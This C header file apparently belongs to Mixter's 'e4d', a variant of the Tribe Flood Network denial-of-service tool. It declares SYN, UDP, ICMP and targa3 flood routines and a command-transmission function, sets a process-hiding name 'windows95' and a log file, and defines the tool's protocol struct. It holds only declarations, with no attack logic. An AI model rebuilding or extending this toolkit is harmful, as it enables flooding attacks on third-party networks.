/*
 * e4d - echelon for dummies
 * by Mixter <mixter@newyorkoffice.com>
 *
 * e4d.h - common definitions and includes
 *
 * This program is distributed for educational purposes and without any
 * explicit or implicit warranty; in no event shall the author or
 * contributors be liable for any direct, indirect or incidental damages
 * arising in any way out of the use of this software.
 *
 */

#ifndef TRIBE_H
#define TRIBE_H

#define LOGFILE         "nsa.txt"
#define HIDEME		"windows95"

#include <stdio.h>
#include <ctype.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>

#define PROTO_SEP	'x'

int rand (void);		/* standard function prototypes */
long int random (void);
void srandom (unsigned int seed);
void srand (unsigned int seed);
int atoi (const char *nptr);
int system (const char *string);
char *getpass (const char *prompt);
char *strtok (char *s, const char *delim);
void *calloc (size_t nmemb, size_t size);
void *malloc (size_t size);
void free (void *ptr);
void bzero (void *s, int n);
void *memset (void *s, int c, size_t n);
char *strncpy (char *dest, const char *src, size_t n);
int strcasecmp (const char *s1, const char *s2);

#include "ip.h"
#include "aes.h"

#define BS 4096

void random_init (void);
inline long getrandom (int, int);
void trimbuf (char *);
#ifdef ATTACKLOG
void dbug (char *);
#endif

void tfntransmit (unsigned long, unsigned long, int, char, char *);

void syn (unsigned long, unsigned short);
void udp (unsigned long);
void targa3 (unsigned long);
void icmp (unsigned long, unsigned long);

inline unsigned long k00lip (void);

struct tribe
  {
    char start;
    char id;
    char end;
  };

#endif
